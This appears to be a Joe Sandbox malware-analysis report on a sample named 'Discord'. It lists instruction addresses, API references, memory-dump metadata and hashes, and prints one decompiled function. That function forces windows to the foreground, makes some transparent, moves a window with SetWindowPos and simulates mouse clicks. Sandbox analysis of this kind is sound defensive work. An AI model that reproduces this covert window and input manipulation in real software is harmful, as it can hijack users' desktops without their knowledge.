0x6de8d44b
0x6de8d522
0x6de8d525
0x6de8d531
0x6de8d536
0x6de8d538
0x00000000
0x6de8d53e
0x6de8d53e
0x6de8d540
0x6de8d543
0x6de8d546
0x6de8d548
0x00000000
0x6de8d54a
0x6de8d578
0x6de8d578
0x6de8d57a
0x6de8d57d
0x6de8d57f
0x6de8d581
0x6de8d56c
0x6de8d56c
0x6de8d56e
0x6de8d571
0x6de8d574
0x6de8d576
0x6de8d552
0x6de8d552
0x6de8d552
0x6de8d555
0x6de8d558
0x6de8d55b
0x6de8d55d
0x00000000
0x00000000
0x6de8d550
0x6de8d550
0x6de8d55f
0x6de8d562
0x6de8d564
0x6de8d566
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6de8d583
0x00000000
0x6de8d583
0x6de8d581
0x6de8d548
0x6de8d4cc
0x6de8d4cc
0x6de8d4d2
0x6de8d4d4
0x6de8d4da
0x6de8d4e0
0x6de8d4f6
0x6de8d4fc
0x6de8d4fc
0x00000000
0x6de8d451
0x6de8d451
0x6de8d45d
0x6de8d45d
0x6de8d462
0x6de8d462
0x6de8d468
0x6de8d468
0x6de8d46e
0x6de8d471
0x6de8d476
0x6de8d47a
0x6de8d47f
0x6de8d481
0x6de8d483
0x6de8d489
0x6de8d48b
0x6de8d491
0x6de8d493
0x6de8d79a
0x6de8d499
0x6de8d499
0x6de8d49d
0x6de8d4a0
0x6de8d4a2
0x6de8d748
0x6de8d74d
0x6de8d753
0x6de8d753
0x6de8d4a2
0x6de8d4a8
0x6de8d4a8
0x6de8d4aa
0x6de8d4b0
0x6de8d4b0
0x6de8d4b2
0x6de8d4ba
0x6de8d4bc
0x6de8d4bf
0x6de8d4c1
0x6de8d590
0x6de8d592
0x6de8d7ab
0x6de8d7b0
0x6de8d5a0
0x6de8d5a0
0x6de8d5a0
0x6de8d5a2
0x6de8d5a7
0x6de8d5ae
0x6de8d5b3
0x6de8d5b6
0x6de8d5b8
0x6de8d5c5
0x6de8d5cb
0x6de8d5ce
0x6de8d5d3
0x6de8d5d3
0x6de8d5e7
0x6de8d5ed
0x6de8d5f0
0x6de8d5f8
0x6de8d600
0x6de8d608
0x6de8d60b
0x6de8d611
0x6de8d611
0x6de8d614
0x6de8d617
0x6de8d61a
0x6de8d62d
0x6de8d633
0x6de8d636
0x6de8d63d
0x6de8d644
0x6de8d648
0x6de8d650
0x6de8d658
0x6de8d660
0x6de8d668
0x6de8d66d
0x6de8d670
0x6de8d674
0x6de8d678
0x6de8d67d
0x6de8d681
0x6de8d689
0x6de8d68e
0x6de8d695
0x6de8d69c
0x6de8d6a0
0x6de8d6a4
0x6de8d6aa
0x6de8d6ad
0x6de8d6af
0x6de8d6b3
0x6de8d6b7
0x6de8d6bb
0x6de8d6be
0x6de8d6be
0x6de8d6c6
0x6de8d6cb
0x6de8d6cb
0x6de8d4c7
0x6de8d4c7
0x6de8d4c7
0x00000000
0x6de8cfd0
0x6de8cfd0
0x6de8cfd5
0x6de8cfda
0x6de8cfdf
0x6de8cfdf
0x6de8cfe4
0x6de8cfe4
0x6de8cfe9
0x6de8cfed
0x6de8cff2
0x6de8cff8
0x6de8cffc
0x6de8d002
0x6de8d007
0x6de8d00d
0x6de8d013
0x6de8d015
0x6de8d015
0x6de8d018
0x6de8d020
0x6de8d022
0x6de8d024
0x6de8d028
0x6de8d02c
0x6de8d030
0x6de8d034
0x6de8d038
0x6de8d03c
0x6de8d040
0x6de8d046
0x6de8d04a
0x6de8d052
0x6de8d054
0x6de8d056
0x6de8d05a
0x6de8d05e
0x6de8d062
0x6de8d066
0x6de8d068
0x6de8d06a
0x6de8d06c
0x6de8d06e
0x6de8d070
0x6de8d0b0
0x6de8d0b0
0x6de8d0b6
0x6de8d0b8
0x6de8d0ba
0x6de8d0bf
0x6de8d0c5
0x6de8d0c7
0x6de8d0c9
0x6de8d0cd
0x6de8d0d2
0x6de8d0da
0x6de8d0e2
0x6de8d0ea
0x6de8d0ee
0x6de8d0f6
0x6de8d0f9
0x6de8d0fd
0x6de8d0fd
0x6de8d080
0x6de8d087
0x6de8d089
0x6de8d08b
0x6de8d08e
0x6de8d093
0x6de8d093
0x6de8d097
0x6de8d09b
0x6de8d09f
0x6de8d0a1
0x6de8d0a3
0x00000000
0x00000000
0x6de8d0a5
0x6de8d0aa
0x6de8d0aa
0x00000000
0x6de8d072
0x6de8d105
0x6de8d105
0x6de8d10a
0x6de8d10f
0x6de8d112
0x6de8d117
0x6de8d11d
0x6de8d121
0x6de8d125
0x6de8d125
0x6de8d12b
0x6de8d12d
0x00000000
0x00000000
0x6de8d13a
0x6de8d13c
0x6de8d13f
0x6de8d142
0x6de8d147
0x6de8d14f
0x6de8d155
0x6de8d155
0x6de8d158
0x6de8d15b
0x6de8d15e
0x6de8d163
0x6de8d167
0x6de8d169
0x6de8d16e
0x6de8d172
0x6de8d17b
0x6de8d180
0x6de8d186
0x6de8d188
0x6de8d18b
0x6de8d18d
0x6de8d2a4
0x6de8d2a4
0x6de8d2ab
0x6de8d2af
0x6de8d7a1
0x6de8d7a1
0x6de8d2b5
0x6de8d2b9
0x6de8d2bc
0x6de8d2c1
0x6de8d2c5
0x6de8d2c8
0x6de8d2cd
0x00000000
0x6de8d193
0x6de8d19e
0x6de8d1a3
0x6de8d1a5
0x00000000
0x6de8d1ab
0x6de8d1b6
0x6de8d1bb
0x6de8d1bd
0x00000000
0x6de8d1c3
0x6de8d1c3
0x6de8d1ce
0x6de8d1d3
0x6de8d1d5
0x6de8d1f8
0x6de8d1f8
0x6de8d1fd
0x6de8d201
0x6de8d203
0x6de8d701
0x6de8d701
0x6de8d705
0x6de8d708
0x6de8d70d
0x6de8d711
0x6de8d714
0x6de8d719
0x00000000
0x6de8d209
0x6de8d209
0x6de8d209
0x6de8d209
0x6de8d20e
0x00000000
0x6de8d214
0x6de8d214
0x6de8d218
0x6de8d21b
0x6de8d220
0x6de8d224
0x6de8d227
0x6de8d22c
0x6de8d231
0x6de8d234
0x6de8d238
0x6de8d790
0x6de8d790
0x6de8cb9c
0x6de8cbaa
0x00000000
0x00000000
0x00000000
0x6de8d238
0x6de8d20e
0x6de8d1d7
0x6de8d1d7
0x6de8d1dd
0x6de8d1df
0x6de8d255
0x6de8d25a
0x6de8d25e
0x6de8d261
0x6de8d26d
0x6de8d26f
0x6de8d27d
0x6de8d283
0x6de8d286
0x6de8d288
0x6de8d28e
0x6de8d293
0x6de8d297
0x6de8d29a
0x6de8d29a
0x6de8d288
0x6de8d1e8
0x6de8d1ea
0x6de8d1ed
0x6de8d1ed
0x6de8d1ed
0x6de8d1f2
0x00000000
0x00000000
0x00000000
0x00000000
0x6de8d1f2
0x6de8d1d5
0x6de8d1bd
0x6de8d1a5
0x00000000
0x6de8d18d
0x6de8d6fd
0x00000000
0x6de8d6fd
0x00000000
0x6de8cd31
0x6de8d761
0x6de8d765
0x6de8d768
0x6de8d76d
0x6de8d771
0x6de8d774
0x6de8d779
0x6de8d780
0x6de8d78a
0x00000000
0x00000000
0x00000000
0x6de8d78a
0x6de8ccaf
0x00000000

APIs

rand.MSVCRT ref: 6DE8CBB0
rand.MSVCRT ref: 6DE8CBB7
rand.MSVCRT ref: 6DE8CBBE
_ZNSsC1ERKSs.LIBSTDC++-6 ref: 6DE8CBDD
_Z10SeuilColorSsR8ColorMaxd.DFO1 ref: 6DE8CC02
IsWindowVisible.USER32 ref: 6DE8CC28
_Z3VSPiRiRdS0_.DPUB1 ref: 6DE8CD0C

Part of subcall function 6DE86370: GetWindowRect.USER32 ref: 6DE863A7
Part of subcall function 6DE86370: _ZNSsC1ERKSs.LIBSTDC++-6 ref: 6DE8645F
Part of subcall function 6DE86370: _Z10SeuilColorSsR8ColorMaxd.DFO1 ref: 6DE86484
Part of subcall function 6DE86370: _ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE8649B

Sleep.KERNEL32 ref: 6DE8CD18
_ZdlPv.LIBSTDC++-6 ref: 6DE8CD3E
GetWindowTextLengthA.USER32 ref: 6DE8CD4B
_Znaj.LIBSTDC++-6 ref: 6DE8CD5A
GetWindowTextA.USER32 ref: 6DE8CD73
_Z21ForceForegroundWindowP6HWND__.DFO1 ref: 6DE8CD84
Sleep.KERNEL32 ref: 6DE8CD90
_Z6CEchapP6HWND__.DFO1 ref: 6DE8CD9D
Sleep.KERNEL32 ref: 6DE8CE25
Sleep.KERNEL32 ref: 6DE8CE5C
EnumWindows.USER32 ref: 6DE8CFA4
Sleep.KERNEL32 ref: 6DE8CFB0
_Z21ForceForegroundWindowP6HWND__.DFO1 ref: 6DE8CFBD
_Z21ForceForegroundWindowP6HWND__.DFO1 ref: 6DE8D112
GetWindowRect.USER32 ref: 6DE8D514
_ZdlPv.LIBSTDC++-6 ref: 6DE8D6DD
_ZdlPv.LIBSTDC++-6 ref: 6DE8D6E9
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8D730
_ZdlPv.LIBSTDC++-6 ref: 6DE8D768
_ZdlPv.LIBSTDC++-6 ref: 6DE8D774

Strings

gfff, xrefs: 6DE8CC3F

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Window$Sleep$Color$ForceForegroundrand$MaxdRectRep10_SeuilSs4_Text$EchapEnumLengthM_destroyM_disposeVisibleWindowsZnaj
String ID: gfff
API String ID: 1254707691-1553575800
Opcode ID: 70d44a9ea0041f081e4be7e28ba445adfb0d3d6899aa2f4574cb113454f33930
Instruction ID: e9488905c0d49e58acaf4efefb30df0f57a4496fc6257f218ebe2884a866ef0d
Opcode Fuzzy Hash: 70d44a9ea0041f081e4be7e28ba445adfb0d3d6899aa2f4574cb113454f33930
Instruction Fuzzy Hash: 579156B190AB01CFD700AF69C18821ABBF0FB89744F158A2EE9D99B351EB35D454CB43

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8D54C Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E6DE8D54C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, long* _a4, long _a8, int _a12, CHAR* _a16, CHAR* _a20, long _a24, signed int _a32, long _a36, int _a40, long _a44, struct HWND__* _a48, char* _a52, char* _a56, long _a60, signed long long _a64, signed long long _a72, long _a80, char _a84, CHAR* _a88, signed short _a90, CHAR* _a92, signed int _a94, long _a108, long long _a112, signed long long _a120, struct tagRECT _a124, intOrPtr _a128, long _a132, long _a136) {
				char* _v0;
				void* _v16;
				void* _v20;
				CHAR* _v24;
				char _v28;
				CHAR* _v48;
				CHAR* _v52;
				void* _v56;

				while(1) {
					L54:
					__eax = __ecx;
					while(1) {
						 *(__eax + 4) = __edx;
						__edx =  *(__eax - 4);
						__ecx = __eax - 4;
						__eflags = __esi - __edx;
						if(__esi < __edx) {
							goto L54;
						}
						__edi =  &(__edi[4]);
						 *__eax = __esi;
						__eflags = __ebx - __edi;
						if(__ebx == __edi) {
							do {
								L41:
								__esi =  *0x6de9e7dc;
								__ebx =  *0x6de9e7d8;
								L42:
								_v0 = __ebx;
								_a8 = 0;
								_a4 = __esi;
								__eax = E6DE95320();
								__eflags = __eax - __esi;
								__ebx = __eax;
								__edi =  *0x6de9e7dc;
								if(__eax != __esi) {
									__edx =  *0x6de9e7dc;
									__eflags = __edx - __esi;
									if(__edx == __esi) {
										__edx = 0;
									} else {
										__edx = __edx - __esi;
										__edx = __edx >> 2;
										__eflags = __edx >> 2;
										if(__edx >> 2 != 0) {
											__eax = memmove(__ebx, __esi, __edx);
											__edx =  *0x6de9e7dc;
											__edx =  *0x6de9e7dc - __esi;
										}
									}
									__edx = __ebx + __edx;
									__eflags = __edx;
									 *0x6de9e7dc = __edx;
									__edi = __edx;
								}
								__esi =  *0x6de9e7d8;
								__edi = __edi - __esi;
								__eax = __edi - __esi >> 2;
								__eflags = __eax;
								if(__eax != 0) {
									goto L60;
								}
								goto L48;
								L51:
								__edi = __esi + 0x40;
								_v52 = 0;
								__eax = E6DE95290(__esi, __edi);
								__eflags = __ebx - __edi;
							} while (__ebx == __edi);
							__esi =  *__edi;
							__edx =  *(__edi - 4);
							__eax = __edi - 4;
							__eflags = __edx - __esi;
							if(__edx > __esi) {
								continue;
							} else {
								goto L58;
							}
						} else {
							L57:
							__esi =  *__edi;
							__edx =  *(__edi - 4);
							__eax = __edi - 4;
							__eflags = __edx - __esi;
							if(__edx > __esi) {
								continue;
							} else {
								L58:
								__eax = __edi;
								__edi =  &(__edi[4]);
								__eflags = __ebx - __edi;
								 *__eax = __esi;
								if(__ebx != __edi) {
									goto L57;
								} else {
									while(1) {
										L41:
										__esi =  *0x6de9e7dc;
										__ebx =  *0x6de9e7d8;
										while(1) {
											L42:
											_v0 = __ebx;
											_a8 = 0;
											_a4 = __esi;
											__eax = E6DE95320();
											__eflags = __eax - __esi;
											__ebx = __eax;
											__edi =  *0x6de9e7dc;
											if(__eax != __esi) {
												__edx =  *0x6de9e7dc;
												__eflags = __edx - __esi;
												if(__edx == __esi) {
													__edx = 0;
												} else {
													__edx = __edx - __esi;
													__edx = __edx >> 2;
													__eflags = __edx >> 2;
													if(__edx >> 2 != 0) {
														__eax = memmove(__ebx, __esi, __edx);
														__edx =  *0x6de9e7dc;
														__edx =  *0x6de9e7dc - __esi;
													}
												}
												__edx = __ebx + __edx;
												__eflags = __edx;
												 *0x6de9e7dc = __edx;
												__edi = __edx;
											}
											__esi =  *0x6de9e7d8;
											__edi = __edi - __esi;
											__eax = __edi - __esi >> 2;
											__eflags = __eax;
											if(__eax != 0) {
												goto L60;
											}
											L47:
											__eax =  *0x6de9e814;
											goto L48;
											L60:
											__eflags = __esi - __edi;
											if(__esi == __edi) {
												__eax =  *0x6de9e814;
												__esi = __edi;
											} else {
												do {
													__ebx =  *__esi;
													__ecx = 0x6de9eaac;
													_v0 = "test";
													L6DE8DD68();
													__esp = __esp - 4;
													__eflags = __eax;
													if(__eax != 0) {
														__eax = GetWindowLongA(__ebx, 0xffffffec);
														__esp = __esp - 8;
														 *0x6de9e85c = __eax;
														__eax = __eax | 0x00080080;
														__eflags = __eax;
														__eax = SetWindowLongA(__ebx, 0xffffffec, __eax);
														__esp = __esp - 0xc;
														_a8 = 2;
														_a4 = 1;
														_v0 = 0;
														 *__esp = __ebx;
														__imp__SetLayeredWindowAttributes();
														__esp = __esp - 0x10;
													}
													 *__esp = __ebx;
													__esi = __esi + 4;
													L6DE8DC70();
													 &_a124 = GetWindowRect(__ebx,  &_a124);
													__esp = __esp - 8;
													__eax = _a136;
													__eax = _a136 - _a128;
													asm("fnstcw word [esp+0x5e]");
													_a20 = 1;
													_a16 = 0;
													_a12 = 0;
													_v0 = 0xffffffff;
													 *__esp = __ebx;
													__eax = __eax >> 0x1f;
													__eax = __eax + (__eax >> 0x1f);
													_a36 = __eax;
													__eax = _a90 & 0x0000ffff;
													asm("fild dword [esp+0x28]");
													asm("fsubr qword [0x6de9e790]");
													_a88 = __ax;
													__eax = _a132;
													__eax = _a132 - _a124.left;
													asm("fldcw word [esp+0x5c]");
													asm("fistp dword [esp+0xc]");
													asm("fldcw word [esp+0x5e]");
													__eax = __eax >> 0x1f;
													__eax = __eax + (__eax >> 0x1f);
													__eax = __eax >> 1;
													_a4 = __eax;
													__eax = _a40();
													__esp = __esp - 0x1c;
													__eflags = __edi - __esi;
												} while (__edi != __esi);
												__eax =  *0x6de9e814;
												__esi =  *0x6de9e7d8;
											}
											goto L48;
										}
									}
								}
							}
						}
						L48:
						__edx =  *0x6de9e7fc;
						__eflags = __eax;
						 *0x6de9e7dc = __esi;
						 *0x6de9e800 =  *0x6de9e7fc;
						if(__eax == 0) {
							 *0x6de9e868 = GetWindowRect( *0x6de9e868, 0x6de9e87c);
							__esp = __esp - 8;
						}
						while(1) {
							__eax = 0x6de9e87c->left;
							asm("fnstcw word [esp+0x5e]");
							__edx = _a94 & 0x0000ffff;
							__ecx =  *0x6de9e888;
							_a40 = __eax;
							asm("fild dword [esp+0x28]");
							_a92 = __dx;
							__edx =  *0x6de9e880;
							asm("fsubr dword [0x6de9814c]");
							__ecx =  *0x6de9e888 - __edx;
							__ecx =  *0x6de9e888 - __edx - 0x32;
							__eflags = __ecx;
							_a40 = __ecx;
							_a32 = _a32 / st0;
							asm("fxch st0, st1");
							asm("fldcw word [esp+0x5c]");
							asm("fistp dword [esp+0x58]");
							asm("fldcw word [esp+0x5e]");
							__ebx = _a88;
							asm("fild dword [esp+0x28]");
							_a40 = __edx;
							_a48 = __ebx;
							asm("fsubr qword [0x6de9e790]");
							asm("fild dword [esp+0x28]");
							_a40 = 1;
							asm("fsubp st1, st0");
							__fp0 = _a32 / st0 / st1;
							asm("fldcw word [esp+0x5c]");
							asm("fistp dword [esp+0x58]");
							asm("fldcw word [esp+0x5e]");
							__edi = _a88;
							asm("fld1");
							asm("fxch st0, st1");
							__esi = __edi;
							asm("fucomip st0, st1");
							st0 = __fp0;
							if(__ecx >= 0) {
								while(1) {
									L17:
									__ecx =  *0x6de9e814;
									__eax = __ebx + __eax;
									__edx = __esi + __edx;
									 *0x6de9e894 = __eax;
									 *0x6de9e898 = __edx;
									__eflags =  *0x6de9e814;
									if( *0x6de9e814 == 0) {
										_a8 = __eax;
										__eax =  *0x6de9e868;
										_a24 = 1;
										_a20 = 0;
										_a16 = 0;
										_a12 = __edx;
										_a4 = 0xffffffff;
										_v0 =  *0x6de9e868;
										__eax = _a44();
										__esp = __esp - 0x1c;
									}
									_v0 = 1;
									__esi = __esi + __edi;
									Sleep(??);
									__esp = __esp - 4;
									_a40 = _a40 + 1;
									__ebx = __ebx + _a48;
									__eflags = __ebx;
									asm("fild dword [esp+0x28]");
									__fp0 = _a32;
									asm("fucomip st0, st1");
									st0 = __fp0;
									if(__ebx < 0) {
										goto L19;
									}
									L16:
									__eax = 0x6de9e87c->left;
									__edx =  *0x6de9e880;
								}
							}
							L14:
							L19:
							__eax =  *0x6de9e868;
							__ebx = 4;
							_v0 =  *0x6de9e868;
							L6DE8DC70();
							__esi = IsWindow;
							__edi = _a56;
							_a40 = 4;
							while(1) {
								__edx =  *0x6de9e814;
								__eflags =  *0x6de9e814;
								if( *0x6de9e814 != 0) {
									break;
								}
								Sleep(0x1770);
								__esp = __esp - 4;
								_v0 = __edi;
								L6DE8DD20();
								__eax =  *0x6de9e868;
								__eax = GetWindowTextLengthA( *0x6de9e868);
								_t79 = __eax + 1; // 0x1
								__ebx = _t79;
								__esp = __esp - 4;
								_v0 = __ebx;
								L6DE8DD50();
								_a4 = __eax;
								__edi = __eax;
								__eax =  *0x6de9e868;
								_a8 = __ebx;
								_v0 =  *0x6de9e868;
								GetWindowTextA(??, ??, ??) =  *0x6de9e868;
								__esp = __esp - 0xc;
								__eax = IsWindow( *0x6de9e868);
								__esp = __esp - 4;
								__eflags = __eax;
								if(__eax == 0) {
									L33:
									__eflags =  *0x6de9e760 - 1;
									_a56 = __edi;
									if( *0x6de9e760 == 1) {
										__eax = E6DE8A200();
									}
									__eax = _a52;
									_v0 = _a52;
									L6DE8DD20();
									__eax = _a56;
									_v0 = _a56;
									L6DE8DD20();
									_a60 = 1;
									goto L1;
								} else {
									__eax = strstr(__edi, 0x6de9e6b8);
									__eflags = __eax;
									if(__eax != 0) {
										goto L33;
									} else {
										__eax = strstr(__edi, 0x6de9e6a8);
										__eflags = __eax;
										if(__eax != 0) {
											goto L33;
										} else {
											__eax = _a52;
											__eax = strstr(_a52, __edi);
											__eflags = __eax;
											if(__eax != 0) {
												L27:
												__eax =  *0x6de9e814;
												_a56 = __edi;
												__eflags =  *0x6de9e814;
												if( *0x6de9e814 != 0) {
													L67:
													__eax = _a52;
													_v0 = _a52;
													L6DE8DD20();
													__eax = _a56;
													_v0 = _a56;
													L6DE8DD20();
													_a60 = 0;
													goto L1;
												} else {
													_t89 =  &_a84;
													 *_t89 = _a84 - 1;
													__eflags =  *_t89;
													if( *_t89 != 0) {
														asm("fldz");
														__eax = _a80;
														_v0 = 0x64;
														_a108 = 0;
														asm("fst qword [esp+0x70]");
														_a12 = _a80;
														__eax =  &_a112;
														_a8 =  &_a112;
														__eax =  &_a108;
														_a4 =  &_a108;
														_a120 = __fp0;
														__eax = E6DE86370();
														Sleep(0x7d0);
														__edi =  *0x6de9e814;
														__esp = __esp - 4;
														__eflags =  *0x6de9e814;
														if( *0x6de9e814 != 0) {
															L70:
															__eax = _a52;
															_v0 = _a52;
															L6DE8DD20();
															__eax = _a56;
															_v0 = _a56;
															L6DE8DD20();
															__eflags =  *0x6de9e760 - 1;
															 *0x6de9e814 = 2;
															if( *0x6de9e760 == 1) {
																goto L71;
															}
															goto L1;
														} else {
															__esi = _a108;
															__eflags = _a108;
															if(_a108 == 0) {
																goto L70;
															} else {
																__eax = _a52;
																_v0 = _a52;
																L6DE8DD20();
																__eax =  *0x6de9e868;
																__eax = GetWindowTextLengthA( *0x6de9e868);
																_t12 = __eax + 1; // 0x1
																__ebx = _t12;
																__esp = __esp - 4;
																_v0 = __ebx;
																L6DE8DD50();
																_a52 = __eax;
																_a4 = __eax;
																__eax =  *0x6de9e868;
																_a8 = __ebx;
																_v0 =  *0x6de9e868;
																GetWindowTextA(??, ??, ??) =  *0x6de9e868;
																__esp = __esp - 0xc;
																_v0 =  *0x6de9e868;
																L6DE8DC70();
																Sleep(0x3e8);
																__eax =  *0x6de9e868;
																__esp = __esp - 4;
																_v0 =  *0x6de9e868;
																L6DE8DCA0();
																__ebx =  *0x6de9e814;
																__eflags =  *0x6de9e814;
																if(__eflags == 0) {
																	 *0x6de9e868 = GetWindowRect( *0x6de9e868, 0x6de9e87c);
																	__esp = __esp - 8;
																}
																__fp0 = _a64;
																asm("fnstcw word [esp+0x5e]");
																__eax = _a94 & 0x0000ffff;
																_v0 = 0x3e8;
																__fp0 = _a64 + _a112;
																_a92 = __ax;
																__fp0 = (_a64 + _a112) *  *0x6de9e780;
																asm("fsubr dword [0x6de98138]");
																asm("fild dword [0x6de9e87c]");
																asm("fsubp st1, st0");
																_a32 = _a32 / st0;
																asm("fxch st0, st1");
																asm("fldcw word [esp+0x5c]");
																asm("fistp dword [esp+0x30]");
																asm("fldcw word [esp+0x5e]");
																_a72 = _a72 + _a120;
																__fp0 = (_a72 + _a120) *  *0x6de9e778;
																asm("fsubr qword [0x6de9e790]");
																asm("fild dword [0x6de9e880]");
																asm("fsubp st1, st0");
																asm("fdivrp st1, st0");
																asm("fldcw word [esp+0x5c]");
																asm("fistp dword [esp+0x58]");
																asm("fldcw word [esp+0x5e]");
																__edi = _a88;
																Sleep(??);
																__esp = __esp - 4;
																asm("fld1");
																__fp0 = _a32;
																asm("fucomip st0, st1");
																st0 = _a32;
																if(__eflags < 0) {
																	__eax = SetWindowPos;
																	_a44 = SetWindowPos;
																} else {
																	__eax = SetWindowPos;
																	__ebx = __edi;
																	__esi = _a48;
																	_a40 = 1;
																	_a44 = SetWindowPos;
																	do {
																		__eax = 0x6de9e87c->left;
																		__ecx =  *0x6de9e880;
																		__edx =  *0x6de9e814;
																		__eax = __esi + 0x6de9e87c->left;
																		__ecx = __ebx +  *0x6de9e880;
																		__eflags =  *0x6de9e814;
																		 *0x6de9e894 = __eax;
																		 *0x6de9e898 = __ecx;
																		if( *0x6de9e814 == 0) {
																			_a8 = __eax;
																			__eax =  *0x6de9e868;
																			_a24 = 1;
																			_a20 = 0;
																			_a16 = 0;
																			_a12 = __ecx;
																			_a4 = 0xffffffff;
																			_v0 =  *0x6de9e868;
																			__eax = _a44();
																			__esp = __esp - 0x1c;
																		}
																		_v0 = 1;
																		__ebx = __ebx + __edi;
																		Sleep(??);
																		__esp = __esp - 4;
																		_a40 = _a40 + 1;
																		__esi = __esi + _a48;
																		__eflags = __esi;
																		asm("fild dword [esp+0x28]");
																		__fp0 = _a32;
																		asm("fucomip st0, st1");
																		st0 = _a32;
																	} while (__esi >= 0);
																}
																__fp0 = _a64;
																asm("fnstcw word [esp+0x5e]");
																__eax = _a94 & 0x0000ffff;
																_a24 = 1;
																_a20 = 0;
																__fp0 = _a64 + _a112;
																_a16 = 0;
																_a4 = 0xffffffff;
																_a92 = __ax;
																__fp0 = (_a64 + _a112) *  *0x6de9e780;
																asm("fsubr dword [0x6de98138]");
																asm("fldcw word [esp+0x5c]");
																asm("fistp dword [esp+0x58]");
																asm("fldcw word [esp+0x5e]");
																__eax = _a88;
																__fp0 = _a72;
																 *0x6de9e894 = __eax;
																_a8 = __eax;
																__eax =  *0x6de9e868;
																__fp0 = _a72 + _a120;
																_v0 =  *0x6de9e868;
																__fp0 = (_a72 + _a120) *  *0x6de9e778;
																asm("fsubr qword [0x6de9e790]");
																asm("fldcw word [esp+0x5c]");
																asm("fistp dword [esp+0x58]");
																asm("fldcw word [esp+0x5e]");
																__edx = _a88;
																 *0x6de9e898 = __edx;
																_a12 = __edx;
																_a44() =  *0x6de9e7d8;
																__esp = __esp - 0x1c;
																__esi = EnumWindows;
																_v24 = 0;
																_v28 = E6DE889C0;
																 *0x6de9e7dc =  *0x6de9e7d8;
																__eax =  *0x6de9e7fc;
																 *0x6de9e800 =  *0x6de9e7fc;
																__eax = EnumWindows(??, ??);
																__esp = __esp - 8;
																Sleep(0xc8);
																__eax =  *0x6de9e868;
																__esp = __esp - 4;
																 *__esp =  *0x6de9e868;
																L6DE8DC70();
																__ecx =  *0x6de9e814;
																__eflags =  *0x6de9e814;
																if( *0x6de9e814 == 0) {
																	Sleep(0x32);
																	__esp = __esp - 4;
																	__ebx = mouse_event;
																	__eax = mouse_event(2, 0, 0, 0, 0);
																	__esp = __esp - 0x14;
																	Sleep(0x32);
																	__esp = __esp - 4;
																	__eax = mouse_event(4, 0, 0, 0, 0);
																	__esp = __esp - 0x14;
																	Sleep(0x64);
																	__esp = __esp - 4;
																	__eax = mouse_event(2, 0, 0, 0, 0);
																	__esp = __esp - 0x14;
																	Sleep(0x32);
																	__esp = __esp - 4;
																	__eax = mouse_event(4, 0, 0, 0, 0);
																	__esp = __esp - 0x14;
																	__ebx = 0x493df;
																	Sleep(0x32);
																	__esp = __esp - 4;
																	_v48 = 0;
																	__eax = EnumWindows(E6DE88B20);
																	__esp = __esp - 8;
																	while(1) {
																		__edi =  *0x6de9e814;
																		__eflags =  *0x6de9e814;
																		if( *0x6de9e814 != 0) {
																			break;
																		}
																		_v52 = 0;
																		__eax = EnumWindows(E6DE88B20);
																		__esp = __esp - 8;
																		__ebx = __ebx - 1;
																		__eflags = __ebx;
																		if(__ebx != 0) {
																			continue;
																		}
																		break;
																	}
																	__ebx =  *0x6de9e7dc;
																	__esi =  *0x6de9e7d8;
																	__eflags = __ebx - __esi;
																	if(__ebx == __esi) {
																		__esi = __ebx;
																	} else {
																		__edi = __ebx;
																		__ecx = 0x1f;
																		__edx = __ebx;
																		__edi = __ebx - __esi;
																		__edi = __edi >> 2;
																		asm("bsr eax, eax");
																		__eax = __edi >> 0x00000002 ^ 0x0000001f;
																		__ecx = 0x1f - (__edi >> 0x00000002 ^ 0x0000001f);
																		__eax = __esi;
																		__ecx = 0x1f - (__edi >> 0x00000002 ^ 0x0000001f) + 0x1f - (__edi >> 0x00000002 ^ 0x0000001f);
																		__eax = E6DE8A040(__esi, 0x1f - (__edi >> 0x00000002 ^ 0x0000001f) + 0x1f - (__edi >> 0x00000002 ^ 0x0000001f), __ebx);
																		__eflags = __edi - 0x43;
																		if(__edi > 0x43) {
																			goto L51;
																		} else {
																			_v52 = 0;
																			__eax = E6DE95290(__esi, __ebx);
																		}
																		goto L41;
																	}
																	goto L42;
																} else {
																	__eax =  *0x6de9e7d8;
																	 *0x6de9e7dc =  *0x6de9e7d8;
																	__eax =  *0x6de9e7fc;
																	 *0x6de9e800 =  *0x6de9e7fc;
																}
																__eax = 0x6de9e87c->left;
																asm("fnstcw word [esp+0x5e]");
																__edx = _a94 & 0x0000ffff;
																__ecx =  *0x6de9e888;
																_a40 = __eax;
																asm("fild dword [esp+0x28]");
																_a92 = __dx;
																__edx =  *0x6de9e880;
																asm("fsubr dword [0x6de9814c]");
																__ecx =  *0x6de9e888 - __edx;
																__ecx =  *0x6de9e888 - __edx - 0x32;
																__eflags = __ecx;
																_a40 = __ecx;
																_a32 = _a32 / st0;
																asm("fxch st0, st1");
																asm("fldcw word [esp+0x5c]");
																asm("fistp dword [esp+0x58]");
																asm("fldcw word [esp+0x5e]");
																__ebx = _a88;
																asm("fild dword [esp+0x28]");
																_a40 = __edx;
																_a48 = __ebx;
																asm("fsubr qword [0x6de9e790]");
																asm("fild dword [esp+0x28]");
																_a40 = 1;
																asm("fsubp st1, st0");
																__fp0 = _a32 / st0 / st1;
																asm("fldcw word [esp+0x5c]");
																asm("fistp dword [esp+0x58]");
																asm("fldcw word [esp+0x5e]");
																__edi = _a88;
